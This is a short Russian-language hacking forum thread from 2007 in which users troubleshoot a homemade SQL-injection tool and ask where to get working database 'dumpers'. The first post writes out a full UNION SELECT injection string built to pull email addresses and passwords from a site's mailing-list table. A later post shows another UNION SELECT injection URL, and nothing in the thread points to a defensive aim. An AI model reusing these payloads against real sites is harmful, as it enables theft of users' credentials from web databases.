 |
|
23.11.2007, 21:31
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
С нами:
10886422
Репутация:
259
|
|
У меня не пашет, вроде ошибок не сделал, sql-outjection.exe сайт.ру /index.php?mode=vareliste&kat_id=-2+union+select+1,2,concat(char(60,115,116,97,114,1 16,62),email,char(58),passwd,char(60,115,116,97,11 4,116,62)),4,5,6+from+maillist+limit+0,1/* 1.txt
Пишет: "kat_id" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
|
|
|
25.11.2007, 19:45
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
С нами:
10522103
Репутация:
272
|
|
мда... конченная у меня программа получилась 
ну понятно, что cmd думает, что & это его комманда и ещет программу kat_id нужно как-то заменить символ &
хз как это сделать. юзай другие, более понтовые программы. Мне не каиф сейчас много думать у меня башка вообще не шарит, после вчерашнего |
|
|
|
26.11.2007, 18:46
|
|
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
С нами:
10511126
Репутация:
73
|
|
плин, подскажите плз где можна намутить работающие дамподелали или хотя бы названия утил\скриптов, с миня многа ++++++ снк.
|
|
|
|
26.11.2007, 19:21
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
С нами:
10522103
Репутация:
272
|
|
Последний раз редактировалось je0n; 26.11.2007 в 19:23..
|
|
|
|
05.12.2007, 18:03
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
У меня не получается... =\ Примерно такая sql-inj:
http://www.site.com/folder/?page=2&id=-45+UNION+SELECT+1,2,3...
Я так понимаю, что у меня не получается, потому что нету скрипта в инъекции?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
